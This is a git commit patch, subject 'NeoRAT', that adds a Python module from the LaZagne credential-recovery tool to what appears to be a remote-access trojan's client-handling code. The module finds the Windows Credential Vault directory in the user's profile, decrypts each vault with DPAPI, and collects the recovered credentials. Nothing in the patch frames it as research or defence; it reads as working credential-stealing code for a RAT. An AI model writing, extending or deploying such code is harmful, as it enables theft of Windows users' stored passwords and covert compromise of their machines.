From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../lazagne/softwares/windows/vaultfiles.py | 23 ++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/windows/vaultfiles.py

(limited to 'foreign/client_handling/lazagne/softwares/windows/vaultfiles.py')

diff --git a/foreign/client_handling/lazagne/softwares/windows/vaultfiles.py b/foreign/client_handling/lazagne/softwares/windows/vaultfiles.py
new file mode 100644
index 0000000..57544b8
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/windows/vaultfiles.py
@@ -0,0 +1,23 @@
+# -*- coding: utf-8 -*-
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.constant import constant
+import os
+
+
+class VaultFiles(ModuleInfo):
+    def __init__(self):
+        ModuleInfo.__init__(self, 'vaultfiles', 'windows', dpapi_used=True)
+
+    def run(self):
+
+        pwd_found = []
+        if constant.user_dpapi and constant.user_dpapi.unlocked:
+            main_vault_directory = os.path.join(constant.profile['APPDATA'], u'..', u'Local', u'Microsoft', u'Vault')
+            main_vault_directory = os.path.abspath(main_vault_directory)
+            if os.path.exists(main_vault_directory):
+                for vault_directory in os.listdir(main_vault_directory):
+                    cred = constant.user_dpapi.decrypt_vault(os.path.join(main_vault_directory, vault_directory))
+                    if cred:
+                        pwd_found.append(cred)
+
+        return pwd_found
--
cgit v1.2.3